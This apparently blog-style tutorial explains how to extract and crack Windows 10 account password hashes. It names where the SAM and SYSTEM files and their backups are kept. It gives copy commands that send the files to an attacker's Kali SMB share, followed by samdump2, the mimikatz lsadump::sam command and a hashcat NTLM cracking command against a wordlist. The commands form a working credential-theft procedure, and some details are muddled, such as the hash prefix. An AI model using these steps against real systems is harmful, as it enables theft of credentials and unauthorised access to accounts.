For a hacker, wouldn't it be ideal if all the Windows usernames and passwords resided within one location to then be analyzed? Well, that's how the Window servers are setup. Technically, there's two files (one containing the hash and one containing the key). Though if you had these two files, you have the keys to the kingdom. Below quickly reviews how to extact the passwords from Windows 10 if you had access to these two files
All the user passwords to access the windows server are hashed and stored within a file called Security Account Manager (SAM) The hashes are encrypted with a key which can be found in a file named SYSTEM. If you have the ability to read the SAM and SYSTEM files, you can extract the hashes. You need both the SAM and SYSTEM file to access the account information directly. Windows is clever in the sense that these files are locked while Windows is running, though copy of these files may exist because they were duplicated, or simply leftovers from an OS patch upgrade. Regardless on the scenario, these files are typically located within the following directory:
The SAM and SYSTEM files are located within the following directory:
C:\Windows\System32\config directoryHowever, these files are locked while Windows is running. Alternatively, backup of the files may exist in the following directories:
C:\Windows\Repairor
C:\Windows\System32\config\RegBackIf you have access to these two files, then you can grab them from the Windows server, onto Kali, to then start the password extractions
You can extract the files from Windows to Kali and then run samdump2 against the files. In order to do this, setup the smbserver on kali in order to extract the files. A quick video link below shows how to initially setup Kali with the smbserver. There's a few gotcha regarding the 2021 image setup, so the video is useful.
Ensure the smbserver is setup and listening on your kali server, as shown below:
There isn't too much justification if 0 files(s) copied, though within the screenshot below, you can see when the smberver is running and when it is not, despite the copy command is correct
copy C:\Windows\repair\SAM \\192.168.112.131\tools\ copy C:\Windows\repair\SYSTEM \\192.168.112.131\tools\
now for the easy part as samdump2 comes OOTB with kali linux (within usr/bin/samdump2). You need to execute the samdump2 with the two parameters like so
# samdump2 /home/kali/SYSTEM /home/kali/SAM
The accounts come with two string values, one for LM authentication, which is now deprecated and only populated with a value to ensure the syntax remains constant. The NTLM string (the second value). If the NTLM string starts with the 316c string, then it's either the account is disabled or no password is set. If they start with a 316c, then these accounts can be ignored Within the newer samdump2, all the hard work has been done with the username having an additional column, *disabled*, on the left of the results.
One item to note is that all the values are 31d6cfe0d16ae931b73c59d7e0c089c0. Typically, anything starting with 31d6 indicates that the account is disabled. You would assume the SYSTEM and SAM files are worthless though Windows 10 changed the hashing format and therefore many of similar tools are redundant. There is, however, an alternative tool, called mimikatz, that is OOTB with Kali and can accommodate the new hashing algo
Downloading this from github then executing this on the windows environment allows you to then display the NTLM attributes
mimikatz # lsadump::sam /system:C:\Users\admin\Desktop\passwordExploits\samAndSystem\SYSTEM /sam:C:\Users\admin\Desktop\passwordExploits\samAndSystem\SAM
These are then use hashcat to then use the NTLM with the m as 1000 (because 1000 is NTLM) to then run against the rockyou.txt file
# hashcat -m 1000 --force fc525c9683e8fe067095ba2ddc971889 /usr/share/wordlists/rockyou.txt
